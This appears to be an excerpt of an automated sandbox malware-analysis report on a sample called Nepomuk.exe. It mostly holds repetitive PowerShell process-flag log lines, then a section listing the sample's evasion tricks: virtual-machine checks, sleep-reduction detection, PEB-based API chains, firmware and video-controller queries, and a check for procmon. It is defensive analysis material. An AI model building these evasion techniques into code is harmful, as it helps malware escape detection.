                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\System32\conhost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                    Malware Analysis System Evasion

                    barindex
                    Contain functionality to detect virtual machines
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: vmtoolsd.exe vmtoolsd.exe vmtoolsd.exe 0_2_00EF2380
                    Contains functionality to detect sleep reduction / modifications
                    Source: C:\Users\user\Desktop\Nepomuk.exeCode function: 0_2_00EF23800_2_00EF2380
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 7_2_009522C07_2_009522C0
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeCode function: 10_2_009522C010_2_009522C0
                    Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                    Source: C:\Users\user\AppData\Local\Temp\T68WJ1SM1U30WFLN7XXTLWOX8.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcess
                    Source: C:\Users\user\Desktop\Nepomuk.exeEvasive API call chain: GetPEB, DecisionNodes, ExitProcessgraph_0-38124
                    Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                    Source: C:\Users\user\Desktop\Nepomuk.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                    Query firmware table information (likely to detect VMs)
                    Source: C:\Users\user\Desktop\Nepomuk.exeSystem information queried: FirmwareTableInformationJump to behavior
                    Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                    Source: Nepomuk.exe, NrEXDJiACHo.exe.7.dr, T68WJ1SM1U30WFLN7XXTLWOX8.exe.0.drBinary or memory string: PROCMON.EXE
